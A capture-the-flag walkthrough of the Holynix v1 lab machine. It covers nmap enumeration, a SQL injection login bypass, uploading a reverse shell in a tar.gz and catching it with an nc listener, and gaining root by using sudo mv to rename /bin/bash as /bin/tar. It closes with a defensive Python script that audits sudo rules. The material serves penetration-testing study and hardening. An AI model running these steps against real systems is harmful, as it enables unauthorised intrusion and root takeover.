HOLYNIX: V1


https://www.vulnhub.com/entry/holynix-v1,20/

Host discovery

# yunki @ yunki in ~/vulnhub/holynix [19:25:02] 
$ nmap -sn 192.168.54.0/24

Nmap scan report for 192.168.54.6
Host is up (0.00074s latency).

Nmap scan

# yunki @ yunki in ~/vulnhub/holynix [19:26:17] 
$ sudo nmap --min-rate 10000 -p- 192.168.54.6         

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:BC:05:DE (VMware)


# yunki @ yunki in ~/vulnhub/holynix [19:26:30] 
$ sudo nmap -sT -sV -O -p80 192.168.54.6

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch)
MAC Address: 00:0C:29:BC:05:DE (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.24 - 2.6.25
Network Distance: 1 hop

# yunki @ yunki in ~/vulnhub/holynix [19:26:56] 
$ sudo nmap -sU -p80 192.168.54.6

PORT   STATE  SERVICE
80/udp closed http
MAC Address: 00:0C:29:BC:05:DE (VMware)


# yunki @ yunki in ~/vulnhub/holynix [19:27:02] 
$ sudo nmap --script=vuln -p80 192.168.54.6

PORT   STATE SERVICE
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /login.php: Possible admin folder
|   /login/: Login page
|   /home/: Potentially interesting folder
|   /icons/: Potentially interesting folder w/ directory listing
|   /img/: Potentially interesting folder
|   /index/: Potentially interesting folder
|   /misc/: Potentially interesting folder
|   /transfer/: Potentially interesting folder
|_  /upload/: Potentially interesting folder
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.54.6:80/?page=login.php%27%20OR%20sqlspider
|     http://192.168.54.6:80/?page=login.php%27%20OR%20sqlspider
|     http://192.168.54.6:80/?page=login.php%27%20OR%20sqlspider
|     http://192.168.54.6:80/index.php?page=login.php%27%20OR%20sqlspider
|     http://192.168.54.6:80/?page=login.php%27%20OR%20sqlspider
|_    http://192.168.54.6:80/index.php?page=login.php%27%20OR%20sqlspider
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-trace: TRACE is enabled
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.54.6
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.54.6:80/?page=login.php
|     Form id: 
|     Form action: /index.php?page=login.php
|     
|     Path: http://192.168.54.6:80/index.php?page=login.php
|     Form id: 
|_    Form action: /index.php?page=login.php
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:BC:05:DE (VMware)

Web penetration

Files can be uploaded, so let's try it. But it turns out:

No permission to upload files. By looking at the directory listing here I found there are many users, so I tried logging in as other accounts with a "universal password" (SQL injection login bypass).

Write a reverse shell, pack it into a tar.gz file, upload it to the target and choose automatic extraction. At the same time, start a listener on Kali.

The upload succeeded, but I don't know where the file ended up, so let's scan for directories.

The scan found the upload folder, but shell.php was not in it. Going back and looking here, it says files are uploaded to the home directory, so let's try the home folder.

The user is etenenbaum, so visit http://192.168.54.6/~etenenbaum/shell.php

Getting an initial shell

# yunki @ yunki in ~ [19:46:59] 
$ sudo nc -lvnp 443                                                                     
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.6] 36909
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686 GNU/Linux
 00:16:12 up 33 min,  0 users,  load average: 0.01, 0.04, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ whoami
www-data
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:0c:29:bc:05:de brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.6/24 brd 192.168.54.255 scope global eth0
    inet6 fe80::20c:29ff:febc:5de/64 scope link 
       valid_lft forever preferred_lft forever

Privilege escalation

$ sudo -l
User www-data may run the following commands on this host:
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /bin/chgrp
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /bin/mv
    
# There are four commands that may be run as root.
# First back up tar, then rename bash to tar.
# Finally, sudo tar actually runs sudo /bin/bash, which gives root.
$ sudo mv /bin/tar /bin/tar.bak
$ sudo mv /bin/bash /bin/tar
$ sudo tar
whoami
root
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:0c:29:bc:05:de brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.6/24 brd 192.168.54.255 scope global eth0
    inet6 fe80::20c:29ff:febc:5de/64 scope link 
       valid_lft forever preferred_lft forever

Both of the two work here; I used the latter (Tip: they are different).
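From the defender's side, the four NOPASSWD rules above are what made root trivial. The following audit script is an addition to this writeup (not the author's code): it parses `sudo -l` output and flags rules that run file-manipulating binaries as root. The risk table and the extra apt-get rule in the sample are assumptions/constructed.

```python
import re
from typing import Dict, List, Tuple

# Binaries that, when runnable as root, let the caller take over root-owned
# files (e.g. swap another allowed binary for a shell, as done above).
# Assumption: seeded from this box's four rules, not an exhaustive list.
RISKY_AS_ROOT: Dict[str, str] = {
    "mv": "renames/moves arbitrary files (can replace other allowed binaries)",
    "chown": "changes ownership of arbitrary files",
    "chgrp": "changes group of arbitrary files",
    "tar": "reads/writes arbitrary files and can invoke helper programs",
}

# One rule line of `sudo -l` output, e.g. "    (root) NOPASSWD: /bin/tar"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+?)\s*$")

# Constructed sample: the four rules shown above plus one harmless rule.
SAMPLE_SUDO_L = """User www-data may run the following commands on this host:
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /bin/chgrp
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /bin/mv
    (root) /usr/bin/apt-get update
"""

def parse_sudo_l(text: str) -> List[Tuple[str, bool, str]]:
    """Return (run-as user, nopasswd?, command) for every rule in `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header or blank line, not a rule
        runas = m.group("runas").split(":")[0].strip() or "root"  # "(root : root)" -> root
        nopasswd = "NOPASSWD:" in m.group("tags").upper()
        for cmd in m.group("cmds").split(","):  # several commands may share one line
            rules.append((runas, nopasswd, cmd.strip()))
    return rules

def audit(text: str) -> List[str]:
    """Flag rules that run a risky binary as root; NOPASSWD ones are the worst."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(text):
        if runas not in ("root", "ALL"):
            continue
        prog = cmd.split()[0].rsplit("/", 1)[-1]  # "/bin/tar" -> "tar"
        if prog in RISKY_AS_ROOT:
            mode = "NOPASSWD" if nopasswd else "password required"
            findings.append(f"{cmd} as root ({mode}): {RISKY_AS_ROOT[prog]}")
    return findings
```

Run `audit(open("sudo-l.txt").read())` against saved `sudo -l` output from each host; on this box it reports all four rules and nothing for the apt-get entry.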
